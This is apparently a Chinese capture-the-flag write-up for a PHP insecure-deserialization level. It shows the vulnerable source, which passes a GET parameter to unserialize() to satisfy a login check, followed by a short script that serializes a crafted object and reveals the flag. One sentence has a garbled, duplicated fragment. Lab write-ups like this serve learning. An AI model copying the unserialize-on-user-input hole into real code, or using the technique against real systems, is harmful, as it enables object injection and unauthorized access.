php-ser-libs-level2

<?php
include("flag.php");    //包含文件flag.php
highlight_file(__FILE__);
include("flag.php");
class mylogin{       //定义一个mylogin类，有两个公共变量user pass
    var $user;
    var $pass;
    function __construct($user,$pass){      //创建对象时传入两个参数$user $pass，将两个参数分别赋值给user和pass属性
        $this->user=$user;
        $this->pass=$pass;
    }
    function login(){   //调用login方法
        if ($this->user=="daydream" and $this->pass=="ok"){   //要使user为daydream pass为ok就会返回1
            return 1;
        }
    }
}
$a=unserialize($_GET['param']);   
if($a->login())
{
    echo $flag;       
}
?> 
<br><a href="../level3">点击进入第三关</a>
Fatal error: Uncaught Error: Call to a member function login() on bool in /var/www/html/index.php:19 Stack trace: #0 {main} thrown in /var/www/html/index.php on line 19

其实也就是能调用login方法，然后满足if ($this->user=="daydream" and$$this->user=="daydream" and $this->pass=="ok")

<?php
include("flag.php");
class mylogin{
    var $user;
    var $pass;
    function __construct($user,$pass){
        $this->user=$user;
        $this->pass=$pass;
    }
    function login(){
        if ($this->user=="daydream" and $this->pass=="ok"){
            return 1;
        }
    }
}
$a=new mylogin("daydream","ok");
echo urlencode(serialize($a));

Geesec{867d6c3c-e44e-4441-be6a-da6c536f4c2f}